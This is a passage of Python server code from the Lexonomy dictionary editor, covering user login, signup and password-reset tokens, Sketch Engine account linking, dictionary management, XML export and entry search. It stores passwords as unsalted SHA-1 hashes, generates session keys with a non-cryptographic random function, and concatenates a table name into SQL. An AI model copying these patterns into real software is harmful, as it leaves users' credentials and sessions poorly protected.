re.sub(r\"[^0-9_]\", \"\", ret)\n return ret\n\ndef getDoctype(xml):\n pat = r\"^<([^>\\/\\s]+)\"\n for match in re.findall(pat, xml):\n return match\n return \"\"\n\ndef getSortTitle(xml, titling):\n if titling.get(\"headwordSorting\"):\n return getEntryHeadword(xml, titling.get(\"headwordSorting\"))\n return getEntryHeadword(xml, titling.get(\"headword\"))\n\ndef generateKey(size=32):\n return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(size))\n\ndef generateDictId(size=8):\n return ''.join(random.choice(\"abcdefghijkmnpqrstuvwxy23456789\") for _ in range(size))\n\ndef login(email, password):\n if siteconfig[\"readonly\"]:\n return {\"success\": False}\n conn = getMainDB()\n passhash = hashlib.sha1(password.encode(\"utf-8\")).hexdigest();\n c = conn.execute(\"select email from users where email=? and passwordHash=?\", (email.lower(), passhash))\n user = c.fetchone()\n if not user:\n return {\"success\": False}\n key = generateKey()\n now = datetime.datetime.utcnow()\n conn.execute(\"update users set sessionKey=?, sessionLast=? where email=?\", (key, now, email))\n conn.commit()\n return {\"success\": True, \"email\": user[\"email\"], \"key\": key}\n\ndef logout(user):\n conn = getMainDB()\n conn.execute(\"update users set sessionKey='', sessionLast='' where email=?\", (user[\"email\"],))\n conn.commit()\n return True\n\ndef sendSignupToken(email, remoteip):\n if siteconfig[\"readonly\"]:\n return False\n conn = getMainDB()\n c = conn.execute(\"select email from users where email=?\", (email.lower(),))\n user = c.fetchone()\n if not user:\n token = secrets.token_hex()\n tokenurl = siteconfig[\"baseUrl\"] + \"createaccount/\" + token\n expireDate = datetime.datetime.now() + datetime.timedelta(days=2)\n mailSubject = \"Lexonomy signup\"\n mailText = \"Dear Lexonomy user,\\n\\n\"\n mailText += \"Somebody (hopefully you, from the address \"+remoteip+\") requested to create a new Lexonomy account. Please follow the link below to create your account:\\n\\n\"\n mailText += tokenurl + \"\\n\\n\"\n mailText += \"For security reasons this link is only valid for two days (until \"+expireDate.isoformat()+\"). If you did not request an account, you can safely ignore this message. \\n\\n\"\n mailText += \"Yours,\\nThe Lexonomy team\"\n conn.execute(\"insert into register_tokens (email, requestAddress, token, expiration) values (?, ?, ?, ?)\", (email, remoteip, token, expireDate))\n conn.commit()\n sendmail(email, mailSubject, mailText)\n return True\n else:\n return False\n\ndef sendToken(email, remoteip):\n if siteconfig[\"readonly\"]:\n return False\n conn = getMainDB()\n c = conn.execute(\"select email from users where email=?\", (email.lower(),))\n user = c.fetchone()\n if user:\n token = secrets.token_hex()\n tokenurl = siteconfig[\"baseUrl\"] + \"recoverpwd/\" + token\n expireDate = datetime.datetime.now() + datetime.timedelta(days=2)\n mailSubject = \"Lexonomy password reset\"\n mailText = \"Dear Lexonomy user,\\n\\n\"\n mailText += \"Somebody (hopefully you, from the address \"+remoteip+\") requested a new password for the Lexonomy account \"+email+\". You can reset your password by clicking the link below:\\n\\n\";\n mailText += tokenurl + \"\\n\\n\"\n mailText += \"For security reasons this link is only valid for two days (until \"+expireDate.isoformat()+\"). If you did not request a password reset, you can safely ignore this message. \\n\\n\"\n mailText += \"Yours,\\nThe Lexonomy team\"\n conn.execute(\"insert into recovery_tokens (email, requestAddress, token, expiration) values (?, ?, ?, ?)\", (email, remoteip, token, expireDate))\n conn.commit()\n sendmail(email, mailSubject, mailText)\n return True\n else:\n return False\n\ndef verifyToken(token, tokenType):\n conn = getMainDB()\n c = conn.execute(\"select * from \"+tokenType+\"_tokens where token=? and expiration>=datetime('now') and usedDate is null\", (token,))\n row = c.fetchone()\n if row:\n return True\n else:\n return False\n\ndef createAccount(token, password, remoteip):\n conn = getMainDB()\n c = conn.execute(\"select * from register_tokens where token=? and expiration>=datetime('now') and usedDate is null\", (token,))\n row = c.fetchone()\n if row:\n c2 = conn.execute(\"select * from users where email=?\", (row[\"email\"],))\n row2 = c2.fetchone()\n if not row2:\n passhash = hashlib.sha1(password.encode(\"utf-8\")).hexdigest();\n conn.execute(\"insert into users (email,passwordHash) values (?,?)\", (row[\"email\"], passhash))\n conn.execute(\"update register_tokens set usedDate=datetime('now'), usedAddress=? where token=?\", (remoteip, token))\n conn.commit()\n return True\n else:\n return False\n else:\n return False\n\ndef resetPwd(token, password, remoteip):\n conn = getMainDB()\n c = conn.execute(\"select * from recovery_tokens where token=? and expiration>=datetime('now') and usedDate is null\", (token,))\n row = c.fetchone()\n if row:\n passhash = hashlib.sha1(password.encode(\"utf-8\")).hexdigest();\n conn.execute(\"update users set passwordHash=? where email=?\", (passhash, row[\"email\"]))\n conn.execute(\"update recovery_tokens set usedDate=datetime('now'), usedAddress=? where token=?\", (remoteip, token))\n conn.commit()\n return True\n else:\n return False\n\ndef setConsent(email, consent):\n conn = getMainDB()\n conn.execute(\"update users set consent=? where email=?\", (consent, email))\n conn.commit()\n return True\n\ndef changePwd(email, password):\n conn = getMainDB()\n passhash = hashlib.sha1(password.encode(\"utf-8\")).hexdigest();\n conn.execute(\"update users set passwordHash=? where email=?\", (passhash, email))\n conn.commit()\n return True\n\ndef changeSkeUserName(email, ske_userName):\n conn = getMainDB()\n conn.execute(\"update users set ske_username=? where email=?\", (ske_userName, email))\n conn.commit()\n return True\n\ndef changeSkeApiKey(email, ske_apiKey):\n conn = getMainDB()\n conn.execute(\"update users set ske_apiKey=? where email=?\", (ske_apiKey, email))\n conn.commit()\n return True\n\ndef updateUserApiKey(user, apiKey):\n conn = getMainDB()\n conn.execute(\"update users set apiKey=? where email=?\", (apiKey, user[\"email\"]))\n conn.commit()\n sendApiKeyToSke(user, apiKey)\n return True\n\ndef sendApiKeyToSke(user, apiKey):\n if user[\"ske_username\"] and user[\"ske_apiKey\"]:\n data = json.dumps({\"options\": {\"settings_lexonomyApiKey\": apiKey, \"settings_lexonomyEmail\": user[\"email\"].lower()}})\n queryData = urllib.parse.urlencode({ \"username\": user[\"ske_username\"], \"api_key\": user[\"ske_apiKey\"], \"json\": data })\n url = \"https://api.sketchengine.eu/bonito/run.cgi/set_user_options?\" + queryData\n res = urllib.request.urlopen(url)\n return True\n\ndef prepareApiKeyForSke(email):\n conn = getMainDB()\n c = conn.execute(\"select * from users where email=?\", (email,))\n row = c.fetchone()\n if row:\n if row[\"apiKey\"] == None or row[\"apiKey\"] == \"\":\n lexapi = generateKey()\n conn.execute(\"update users set apiKey=? where email=?\", (lexapi, email))\n conn.commit()\n else:\n lexapi = row[\"apiKey\"]\n sendApiKeyToSke(row, lexapi)\n return True\n\n\ndef processJWT(user, jwtdata):\n conn = getMainDB()\n c = conn.execute(\"select * from users where ske_id=?\", (jwtdata[\"user\"][\"id\"],))\n row = c.fetchone()\n key = generateKey()\n now = datetime.datetime.utcnow()\n if row:\n #if SkE ID in database = log in user\n conn.execute(\"update users set sessionKey=?, sessionLast=? where email=?\", (key, now, row[\"email\"]))\n conn.commit()\n prepareApiKeyForSke(row[\"email\"])\n return {\"success\": True, \"email\": row[\"email\"], \"key\": key}\n else:\n if user[\"loggedin\"]:\n #user logged in = save SkE ID in database\n conn.execute(\"update users set ske_id=?, ske_username=?, ske_apiKey=?, sessionKey=?, sessionLast=? where email=?\", (jwtdata[\"user\"][\"id\"], jwtdata[\"user\"][\"username\"], jwtdata[\"user\"][\"api_key\"], key, now, user[\"email\"]))\n conn.commit()\n prepareApiKeyForSke(user[\"email\"])\n return {\"success\": True, \"email\": user[\"email\"], \"key\": key}\n else:\n #user not logged in = register and log in\n email = jwtdata[\"user\"][\"email\"].lower()\n c2 = conn.execute(\"select * from users where email=?\", (email,))\n row2 = c2.fetchone()\n if not row2:\n lexapi = generateKey()\n conn.execute(\"insert into users (email, passwordHash, ske_id, ske_username, ske_apiKey, sessionKey, sessionLast, apiKey) values (?, null, ?, ?, ?, ?, ?, ?)\", (email, jwtdata[\"user\"][\"id\"], jwtdata[\"user\"][\"username\"], jwtdata[\"user\"][\"api_key\"], key, now, lexapi))\n conn.commit()\n prepareApiKeyForSke(email)\n return {\"success\": True, \"email\": email, \"key\": key}\n else:\n return {\"success\": False, \"error\": \"user with email \" + email + \" already exists. Log-in and connect account to SkE.\"}\n\n\ndef dictExists(dictID):\n return os.path.isfile(os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + dictID + \".sqlite\"))\n\ndef suggestDictId():\n dictid = generateDictId()\n while dictid in prohibitedDictIDs or dictExists(dictid):\n dictid = generateDictId()\n return dictid\n\ndef makeDict(dictID, template, title, blurb, email):\n if title == \"\":\n title = \"?\"\n if blurb == \"\":\n blurb = \"\"\n if dictID in prohibitedDictIDs or dictExists(dictID):\n return False\n if not template.startswith(\"/\"):\n template = \"dictTemplates/\" + template + \".sqlite\"\n shutil.copy(template, os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + dictID + \".sqlite\"))\n users = {email: {\"canEdit\": True, \"canConfig\": True, \"canDownload\": True, \"canUpload\": True}}\n dictDB = getDB(dictID)\n dictDB.execute(\"update configs set json=? where id='users'\", (json.dumps(users),))\n ident = {\"title\": title, \"blurb\": blurb}\n dictDB.execute(\"update configs set json=? where id='ident'\", (json.dumps(ident),))\n dictDB.commit()\n attachDict(dictDB, dictID)\n return True\n\ndef attachDict(dictDB, dictID):\n configs = readDictConfigs(dictDB)\n conn = getMainDB()\n conn.execute(\"delete from dicts where id=?\", (dictID,))\n conn.execute(\"delete from user_dict where dict_id=?\", (dictID,))\n title = configs[\"ident\"][\"title\"]\n conn.execute(\"insert into dicts(id, title) values (?, ?)\", (dictID, title))\n for email in configs[\"users\"]:\n conn.execute(\"insert into user_dict(dict_id, user_email) values (?, ?)\", (dictID, email.lower()))\n conn.commit()\n\ndef cloneDict(dictID, email):\n newID = suggestDictId()\n shutil.copy(os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + dictID + \".sqlite\"), os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + newID + \".sqlite\"))\n newDB = getDB(newID)\n res = newDB.execute(\"select json from configs where id='ident'\")\n row = res.fetchone()\n ident = {\"title\": \"?\", \"blurb\": \"?\"}\n if row:\n ident = json.loads(row[\"json\"])\n ident[\"title\"] = \"Clone of \" + ident[\"title\"]\n newDB.execute(\"update configs set json=? where id='ident'\", (json.dumps(ident),))\n newDB.commit()\n attachDict(newDB, newID)\n return {\"success\": True, \"dictID\": newID, \"title\": ident[\"title\"]}\n\ndef destroyDict(dictID):\n conn = getMainDB()\n conn.execute(\"delete from dicts where id=?\", (dictID,))\n conn.execute(\"delete from user_dict where dict_id=?\", (dictID,))\n conn.commit()\n os.remove(os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + dictID + \".sqlite\"))\n return True\n\ndef moveDict(oldID, newID):\n if newID in prohibitedDictIDs or dictExists(newID):\n return False\n shutil.move(os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + oldID + \".sqlite\"), os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + newID + \".sqlite\"))\n conn = getMainDB()\n conn.execute(\"delete from dicts where id=?\", (oldID,))\n conn.commit()\n dictDB = getDB(newID)\n attachDict(dictDB, newID)\n return True\n\ndef getDoc(docID):\n if os.path.isfile(\"docs/\"+docID+\".md\"):\n doc = {\"id\": docID, \"title\":\"\", \"html\": \"\"}\n html = markdown.markdown(open(\"docs/\"+docID+\".md\").read())\n title = re.search('

([^<]*)

', html)\n if title:\n doc[\"title\"] = re.sub('<\\/?h1>','', title.group(0))\n doc[\"html\"] = html\n return doc\n else:\n return False\n\ndef getDictsByUser(email):\n dicts = []\n conn = getMainDB()\n c = conn.execute(\"select d.id, d.title from dicts as d inner join user_dict as ud on ud.dict_id=d.id where ud.user_email=? order by d.title\", (email,))\n for r in c.fetchall():\n info = {\"id\": r[\"id\"], \"title\": r[\"title\"]}\n try:\n configs = readDictConfigs(getDB(r[\"id\"]))\n if configs[\"users\"][email] and configs[\"users\"][email][\"canConfig\"]:\n info[\"currentUserCanDelete\"] = True\n except:\n info[\"broken\"] = True\n dicts.append(info)\n return dicts\n\ndef listUsers(searchtext, howmany):\n conn = getMainDB()\n c = conn.execute(\"select * from users where email like ? order by email limit ?\", (\"%\"+searchtext+\"%\", howmany))\n users = []\n for r in c.fetchall():\n users.append({\"id\": r[\"email\"], \"title\": r[\"email\"]})\n c = conn.execute(\"select count(*) as total from users where email like ?\", (\"%\"+searchtext+\"%\", ))\n r = c.fetchone()\n total = r[\"total\"]\n return {\"entries\":users, \"total\": total}\n\ndef createUser(xml):\n from lxml import etree as ET\n root = ET.fromstring(xml)\n email = root.attrib[\"email\"]\n passhash = hashlib.sha1(root.attrib[\"password\"].encode(\"utf-8\")).hexdigest();\n conn = getMainDB()\n conn.execute(\"insert into users(email, passwordHash) values(?, ?)\", (email.lower(), passhash))\n conn.commit()\n return {\"entryID\": email, \"adjustedXml\": readUser(email)[\"xml\"]}\n\ndef updateUser(email, xml):\n from lxml import etree as ET\n root = ET.fromstring(xml)\n if root.attrib['password']:\n passhash = hashlib.sha1(root.attrib[\"password\"].encode(\"utf-8\")).hexdigest();\n conn = getMainDB()\n conn.execute(\"update users set passwordHash=? where email=?\", (passhash, email.lower()))\n conn.commit()\n return readUser(email)\n\ndef deleteUser(email):\n conn = getMainDB()\n conn.execute(\"delete from users where email=?\", (email.lower(),))\n conn.commit()\n return True\n\ndef readUser(email):\n conn = getMainDB()\n c = conn.execute(\"select * from users where email=?\", (email.lower(), ))\n r = c.fetchone()\n if r:\n if r[\"sessionLast\"]:\n xml = \"\"\n else:\n xml = \"\"\n c2 = conn.execute(\"select d.id, d.title from user_dict as ud inner join dicts as d on d.id=ud.dict_id where ud.user_email=? order by d.title\", (r[\"email\"], ))\n for r2 in c2.fetchall():\n xml += \"\"\n xml += \"\"\n return {\"email\": r[\"email\"], \"xml\": xml}\n else:\n return {\"email\":\"\", \"xml\":\"\"}\n\ndef listDicts(searchtext, howmany):\n conn = getMainDB()\n c = conn.execute(\"select * from dicts where id like ? or title like ? order by id limit ?\", (\"%\"+searchtext+\"%\", \"%\"+searchtext+\"%\", howmany))\n dicts = []\n for r in c.fetchall():\n dicts.append({\"id\": r[\"id\"], \"title\": r[\"title\"]})\n c = conn.execute(\"select count(*) as total from dicts where id like ? or title like ?\", (\"%\"+searchtext+\"%\", \"%\"+searchtext+\"%\"))\n r = c.fetchone()\n total = r[\"total\"]\n return {\"entries\": dicts, \"total\": total}\n\ndef readDict(dictId):\n conn = getMainDB()\n c = conn.execute(\"select * from dicts where id=?\", (dictId, ))\n r = c.fetchone()\n if r:\n xml = \"\"\n c2 = conn.execute(\"select u.email from user_dict as ud inner join users as u on u.email=ud.user_email where ud.dict_id=? order by u.email\", (r[\"id\"], ))\n for r2 in c2.fetchall():\n xml += \"\"\n xml += \"\"\n return {\"id\": r[\"id\"], \"xml\": xml}\n else:\n return {\"id\":\"\", \"xml\":\"\"}\n\ndef clean4xml(text):\n return text.replace(\"&\", \"&\").replace('\"', \""\").replace(\"'\", \"'\").replace(\"<\", \"<\").replace(\">\", \">\");\n\ndef markdown_text(text):\n return markdown.markdown(text).replace(\"
\\/]*)\\s+xmlns:lxnm=['\\\"]http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"']\", r\"\\1\", xml)\n xml = re.sub(r\"^(<[^>\\/]*)\\s+lxnm:entryID=['\\\"][^\\\"\\']*[\\\"']\", r\"\\1\", xml)\n xml = re.sub(r\"^(<[^>\\/]*)\\s+lxnm:subentryID=['\\\"][^\\\"\\']*[\\\"']\", r\"\\1\", xml)\n xml = re.sub(r\"^(<[^>\\/]*)\\s+lxnm:linkable=['\\\"][^\\\"\\']*[\\\"']\", r\"\\1\", xml)\n #get name of the top-level element\n root = \"\"\n root = re.search(r\"^<([^\\s>\\/]+)\", xml, flags=re.M).group(1)\n #set housekeeping attributes\n if root in subbing:\n xml = re.sub(r\"^<([^\\s>\\/]+)\", r\"<\\1 lxnm:subentryID='\"+entryID+\"'\", xml)\n else:\n xml = re.sub(r\"^<([^\\s>\\/]+)\", r\"<\\1 lxnm:entryID='\"+entryID+\"'\", xml)\n xml = re.sub(r\"^<([^\\s>\\/]+)\", r\"<\\1 xmlns:lxnm='http://www.lexonomy.eu/'\", xml)\n return xml\n\ndef exportEntryXml(dictDB, dictID, entryID, configs, baseUrl):\n c = dictDB.execute(\"select * from entries where id=?\", (entryID,))\n row = c.fetchone()\n if row:\n xml = setHousekeepingAttributes(entryID, row[\"xml\"], configs[\"subbing\"])\n attribs = \" this=\\\"\" + baseUrl + dictID + \"/\" + str(row[\"id\"]) + \".xml\\\"\"\n c2 = dictDB.execute(\"select e1.id, e1.title from entries as e1 where e1.sortkey<(select sortkey from entries where id=?) order by e1.sortkey desc limit 1\", (entryID, ))\n r2 = c2.fetchone()\n if r2:\n attribs += \" previous=\\\"\" + baseUrl + dictID + \"/\" + str(r2[\"id\"]) + \".xml\\\"\"\n c2 = dictDB.execute(\"select e1.id, e1.title from entries as e1 where e1.sortkey>(select sortkey from entries where id=?) order by e1.sortkey asc limit 1\", (entryID, ))\n r2 = c2.fetchone()\n if r2:\n attribs += \" next=\\\"\" + baseUrl + dictID + \"/\" + str(r2[\"id\"]) + \".xml\\\"\"\n xml = \"\" + xml + \"\"\n return {\"entryID\": row[\"id\"], \"xml\": xml}\n else:\n return {\"entryID\": 0, \"xml\": \"\"}\n\ndef readNabesByEntryID(dictDB, dictID, entryID, configs):\n nabes = []\n #before\n c = dictDB.execute(\"select e1.id, e1.title from entries as e1 where e1.doctype=? and e1.sortkey<=(select sortkey from entries where id=?) order by e1.sortkey desc limit 8\", (configs[\"xema\"][\"root\"], entryID))\n for r in c.fetchall():\n nabes.insert(0, {\"id\": r[\"id\"], \"title\": r[\"title\"]})\n #after\n c = dictDB.execute(\"select e1.id, e1.title from entries as e1 where e1.doctype=? and e1.sortkey>(select sortkey from entries where id=?) order by e1.sortkey asc limit 15\", (configs[\"xema\"][\"root\"], entryID))\n for r in c.fetchall():\n nabes.append({\"id\": r[\"id\"], \"title\": r[\"title\"]})\n return nabes\n\ndef readNabesByText(dictDB, dictID, configs, text):\n nabes = []\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n sortkey = toSortKey(text, abc)\n #before\n c = dictDB.execute(\"select e1.id, e1.title from entries as e1 where doctype=? and e1.sortkey<=? order by e1.sortkey desc limit 8\", (configs[\"xema\"][\"root\"], sortkey))\n for r in c.fetchall():\n nabes.insert(0, {\"id\": r[\"id\"], \"title\": r[\"title\"]})\n #after\n c = dictDB.execute(\"select e1.id, e1.title from entries as e1 where doctype=? and e1.sortkey>? order by e1.sortkey asc limit 15\", (configs[\"xema\"][\"root\"], sortkey))\n for r in c.fetchall():\n nabes.append({\"id\": r[\"id\"], \"title\": r[\"title\"]})\n return nabes\n\ndef readRandoms(dictDB):\n configs = readDictConfigs(dictDB)\n limit = 75\n more = False\n randoms = []\n c = dictDB.execute(\"select id, title from entries where doctype=? and id in (select id from entries order by random() limit ?) order by sortkey\", (configs[\"xema\"][\"root\"], limit))\n for r in c.fetchall():\n randoms.append({\"id\": r[\"id\"], \"title\": r[\"title\"]})\n c = dictDB.execute(\"select count(*) as total from entries\")\n r = c.fetchone()\n if r[\"total\"] > limit:\n more = True\n return {\"entries\": randoms, \"more\": more}\n\ndef readRandomOne(dictDB, dictID, configs):\n c = dictDB.execute(\"select id, title, xml from entries where id in (select id from entries where doctype=? order by random() limit 1)\", (configs[\"xema\"][\"root\"], ))\n r = c.fetchone()\n if r:\n return {\"id\": r[\"id\"], \"title\": r[\"title\"], \"xml\": r[\"xml\"]}\n else:\n return {\"id\": 0, \"title\": \"\", \"xml\": \"\"}\n\ndef download_xslt(configs):\n if 'download' in configs and 'xslt' in configs['download'] and configs['download']['xslt'].strip != \"\" and len(configs['download']['xslt']) > 0 and configs['download']['xslt'][0] == \"<\":\n import lxml.etree as ET\n try:\n xslt_dom = ET.XML(configs[\"download\"][\"xslt\"].encode(\"utf-8\"))\n xslt = ET.XSLT(xslt_dom)\n except (ET.XSLTParseError, ET.XMLSyntaxError) as e:\n return \"Failed to parse XSL: {}\".format(e), False\n\n def transform(xml_txt):\n try:\n dom = ET.XML(xml_txt)\n xml_transformed_dom = xslt(dom)\n xml_transformed_byt = ET.tostring(xml_transformed_dom, xml_declaration=False, encoding=\"utf-8\")\n xml_transformed = xml_transformed_byt.decode('utf-8')\n return xml_transformed, True\n except ET.XMLSyntaxError as e:\n return \"Failed to parse content: {}\".format(e), False\n except ET.XSLTParseError as e:\n return \"Failed to use XSL: {}\".format(e), False\n else:\n def transform(xml_text):\n return re.sub(\"><\",\">\\n<\",xml_text), True\n\n return transform\n\n\ndef download(dictDB, dictID, configs):\n rootname = dictID.lstrip(\" 0123456789\")\n if rootname == \"\":\n rootname = \"lexonomy\"\n yield \"<\"+rootname+\">\\n\"\n c = dictDB.execute(\"select id, xml from entries\")\n\n transform = download_xslt(configs)\n\n for r in c.fetchall():\n xml = setHousekeepingAttributes(r[\"id\"], r[\"xml\"], configs[\"subbing\"])\n xml_xsl, success = transform(xml)\n if not success:\n return xml_xsl, 400\n\n yield xml_xsl\n yield \"\\n\"\n\n yield \"\\n\"\n\ndef purge(dictDB, email, historiography):\n dictDB.execute(\"insert into history(entry_id, action, [when], email, xml, historiography) select id, 'purge', ?, ?, xml, ? from entries\", (str(datetime.datetime.utcnow()), email, json.dumps(historiography)))\n dictDB.execute(\"delete from entries\")\n dictDB.commit()\n dictDB.execute(\"vacuum\")\n dictDB.commit()\n return True\n\ndef showImportErrors(filename, truncate):\n with open(filename+\".err\", \"r\") as content_file:\n content = content_file.read()\n if (truncate):\n content = content[0:truncate].replace(\"<\", \"<\")\n return {\"errorData\": content, \"truncated\": truncate}\n else:\n return content\n\ndef importfile(dictID, filename, email):\n import subprocess\n pidfile = filename + \".pid\";\n errfile = filename + \".err\";\n if os.path.isfile(pidfile):\n return checkImportStatus(pidfile, errfile)\n try:\n pidfile_f = open(pidfile, \"w\")\n errfile_f = open(errfile, \"w\")\n except:\n return checkImportStatus(pidfile, errfile)\n dbpath = os.path.join(siteconfig[\"dataDir\"], \"dicts/\"+dictID+\".sqlite\")\n p = subprocess.Popen([\"adminscripts/import.py\", dbpath, filename, email], stdout=pidfile_f, stderr=errfile_f, start_new_session=True, close_fds=True)\n return {\"progressMessage\": \"Import started. Please wait...\", \"finished\": False, \"errors\": False}\n\ndef checkImportStatus(pidfile, errfile):\n with open(pidfile, \"r\") as content_file:\n content = content_file.read()\n pid_data = re.split(r\"[\\n\\r]\", content)\n if pid_data[-1] == \"\":\n progress = pid_data[-2]\n else:\n progress = pid_data[-1]\n finished = False\n if \"100%\" in progress:\n finished = True\n errors = False\n if os.path.isfile(errfile) and os.stat(errfile).st_size:\n errors = True\n return {\"progressMessage\": progress, \"finished\": finished, \"errors\": errors}\n\ndef readDoctypesUsed(dictDB):\n c = dictDB.execute(\"select doctype from entries group by doctype order by count(*) desc\")\n doctypes = []\n for r in c.fetchall():\n doctypes.append(r[\"doctype\"])\n return doctypes\n\ndef getLastEditedEntry(dictDB, email):\n c = dictDB.execute(\"select entry_id from history where email=? order by [when] desc limit 1\", (email, ))\n r = c.fetchone()\n if r:\n return str(r[\"entry_id\"])\n else:\n return \"\"\n\ndef listEntriesById(dictDB, entryID, configs):\n c = dictDB.execute(\"select e.id, e.title, e.xml from entries as e where e.id=?\", (entryID,))\n entries = []\n for r in c.fetchall():\n xml = setHousekeepingAttributes(r[\"id\"], r[\"xml\"], configs[\"subbing\"])\n entries.append({\"id\": r[\"id\"], \"title\": r[\"title\"], \"xml\": xml})\n return entries\n\ndef listEntries(dictDB, dictID, configs, doctype, searchtext=\"\", modifier=\"start\", howmany=10, sortdesc=False, reverse=False, fullXML=False):\n searchtext = searchtext.lower()\n if type(sortdesc) == str:\n if sortdesc == \"true\":\n sortdesc = True\n else:\n sortdesc = False\n if \"flag_element\" in configs[\"flagging\"] or fullXML:\n entryXML = \", e.xml \"\n else:\n entryXML = \"\"\n if \"headwordSortDesc\" in configs[\"titling\"]:\n reverse = configs[\"titling\"][\"headwordSortDesc\"]\n if reverse:\n sortdesc = not sortdesc\n if sortdesc:\n sortpar = \" DESC \"\n else:\n sortpar = \"\"\n\n if modifier == \"start\":\n sql1 = \"select s.txt, min(s.level) as level, e.id, e.title\" + entryXML + \" from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt like ? group by e.id order by e.sortkey\" + sortpar + \", s.level limit ?\"\n params1 = (doctype, searchtext+\"%\", howmany)\n sql2 = \"select count(distinct s.entry_id) as total from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt like ?\"\n params2 = (doctype, searchtext+\"%\")\n elif modifier == \"wordstart\":\n sql1 = \"select s.txt, min(s.level) as level, e.id, e.title\" + entryXML + \" from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and (s.txt like ? or s.txt like ?) group by e.id order by e.sortkey\" + sortpar + \", s.level limit ?\"\n params1 = (doctype, searchtext + \"%\", \"% \" + searchtext + \"%\", howmany)\n sql2 = \"select count(distinct s.entry_id) as total from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and (s.txt like ? or s.txt like ?)\"\n params2 = (doctype, searchtext + \"%\", \"% \" + searchtext + \"%\")\n elif modifier == \"substring\":\n sql1 = \"select s.txt, min(s.level) as level, e.id, e.title\" + entryXML + \" from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt like ? group by e.id order by e.sortkey\" + sortpar + \", s.level limit ?\"\n params1 = (doctype, \"% \" + searchtext + \"%\", howmany)\n sql2 = \"select count(distinct s.entry_id) as total from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt like ?\"\n params2 = (doctype, \"% \" + searchtext + \"%\")\n elif modifier == \"exact\":\n sql1 = \"select s.txt, min(s.level) as level, e.id, e.title\" + entryXML + \" from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt=? group by e.id order by e.sortkey\" + sortpar + \", s.level limit ?\"\n params1 = (doctype, searchtext, howmany)\n sql2 = \"select count(distinct s.entry_id) as total from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt=?\"\n params2 = (doctype, searchtext)\n c1 = dictDB.execute(sql1, params1)\n entries = []\n for r1 in c1.fetchall():\n item = {\"id\": r1[\"id\"], \"title\": r1[\"title\"]}\n if \"flag_element\" in configs[\"flagging\"]:\n item[\"flag\"] = extractText(r1[\"xml\"], configs[\"flagging\"][\"flag_element\"])\n if fullXML:\n item[\"xml\"] = setHousekeepingAttributes(r1[\"id\"], r1[\"xml\"], configs[\"subbing\"])\n if r1[\"level\"] > 1:\n item[\"title\"] += \" ← \" + r1[\"txt\"] + \"\"\n entries.append(item)\n c2 = dictDB.execute(sql2, params2)\n r2 = c2.fetchone()\n total = r2[\"total\"]\n return total, entries\n\ndef listEntriesPublic(dictDB, dictID, configs, searchtext):\n howmany = 100\n sql_list = \"select s.txt, min(s.level) as level, e.id, e.title, case when s.txt=? then 1 else 2 end as priority from searchables as s inner join entries as e on e.id=s.entry_id where s.txt like ? and e.doctype=? group by e.id order by priority, level, e.sortkey, s.level limit ?\"\n c1 = dictDB.execute(sql_list, (\"%\"+searchtext+\"%\", \"%\"+searchtext+\"%\", configs[\"xema\"].get(\"root\"), howmany))\n entries = []\n for r1 in c1.fetchall():\n item = {\"id\": r1[\"id\"], \"title\": r1[\"title\"], \"exactMatch\": (r1[\"level\"] == 1 and r1[\"priority\"] == 1)}\n if r1[\"level\"] > 1:\n item[\"title\"] += \" ← \" + r1[\"txt\"] + \"\"\n entries.append(item)\n return entries\n\ndef extractText(xml, elName):\n elName = str(elName)\n if elName == \"\":\n return []\n pat = r\"<\" + elName + \"[^>]*>([^<]*)\"\n return re.findall(pat, xml)\n\ndef extractFirstText(xml):\n pat = r\"<([^\\s>]+)[^>]*>([^<>]*?)]+)>\"\n for match in re.findall(pat, xml):\n if match[0] == match[2] and match[1].strip() != \"\":\n return match[1].strip()\n return \"\"\n\ndef getDictStats(dictDB):\n res = {\"entryCount\": 0, \"needResave\": 0}\n c = dictDB.execute(\"select count(*) as entryCount from entries\")\n r = c.fetchone()\n res[\"entryCount\"] = r[\"entryCount\"]\n c = dictDB.execute(\"select count(*) as needResave from entries where needs_resave=1 or needs_refresh=1 or needs_refac=1\")\n r = c.fetchone()\n res[\"needResave\"] = r[\"needResave\"]\n return res\n\ndef updateDictConfig(dictDB, dictID, configID, content):\n dictDB.execute(\"delete from configs where id=?\", (configID, ))\n dictDB.execute(\"insert into configs(id, json) values(?, ?)\", (configID, json.dumps(content)))\n dictDB.commit()\n\n if configID == \"ident\" or configID == \"users\":\n attachDict(dictDB, dictID)\n return content, False\n elif configID == \"titling\" or configID == \"searchability\":\n resaveNeeded = flagForResave(dictDB)\n return content, resaveNeeded\n elif configID == \"links\":\n resaveNeeded = flagForResave(dictDB)\n c = dictDB.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='linkables'\")\n if not c.fetchone():\n dictDB.execute(\"CREATE TABLE linkables (id INTEGER PRIMARY KEY AUTOINCREMENT, entry_id INTEGER REFERENCES entries (id) ON DELETE CASCADE, txt TEXT, element TEXT)\")\n dictDB.execute(\"CREATE INDEX link ON linkables (txt)\")\n return content, resaveNeeded\n elif configID == \"subbing\":\n refacNeeded = flagForRefac(dictDB)\n return content, refacNeeded\n else:\n return content, False\n\ndef flagForResave(dictDB):\n c = dictDB.execute(\"update entries set needs_resave=1\")\n dictDB.commit()\n return (c.rowcount > 0)\n\ndef flagForRefac(dictDB):\n c = dictDB.execute(\"update entries set needs_refac=1\")\n dictDB.commit()\n return (c.rowcount > 0)\n\ndef makeQuery(lemma):\n words = []\n for w in lemma.split(\" 